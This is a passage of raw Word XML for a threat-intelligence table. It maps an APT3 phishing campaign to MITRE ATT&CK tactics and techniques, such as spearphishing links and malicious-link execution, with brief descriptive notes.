              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A5CAC05" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="703FEB9E" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5F3F0841" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="002D1D50" w14:paraId="1A1F461F" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17980601" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2B08BD" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13FB133A" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="221D665F" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CED1D3B" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F874EA8" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E13DED" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60117E18" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="002D1D50" w14:paraId="07107C7F" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD1E037" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A93665C" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63CAC318" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74AB4A3B" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A4BA374" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72CA9A3D" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="618C1516" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5611E1CE" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="007545F1" w14:paraId="7B5A1147" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E84D3C1" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68BC4EC1" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B26326F" w14:textId="7B0253BB" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1566.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23698A84" w14:textId="23532DF6" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22F3BAA7" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4C6431" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CACAF9A" w14:textId="4CB9BFF2" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D96DE7" w14:textId="1EA2C3ED" w:rsidR="007545F1" w:rsidRPr="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] The phishing emails used by APT3 during this campaign were extremely generic in nature, almost appearing to be spam.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00045888" w14:paraId="1790FB38" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3D7A8E" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A9376DE" w14:textId="0EC99823" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000966C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06442853" w14:textId="062F4B80" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>User Execution: Malicious Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCBAD6C" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C90E0E" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132D18D0" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441DA25A" w14:textId="267CC58C" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FEA38C7" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Upon clicking the URLs provided in the phishing emails, targets were redirected to a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">compromised server </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">hosting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> profiling scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00045888" w14:paraId="3DB840C9" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D6908D" w14:textId="08920215" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="077428E6" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00045888">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E51B176" w14:textId="52ACB1E9" w:rsidR="007545F1" w:rsidRPr="00045888" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007545F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007545F1">
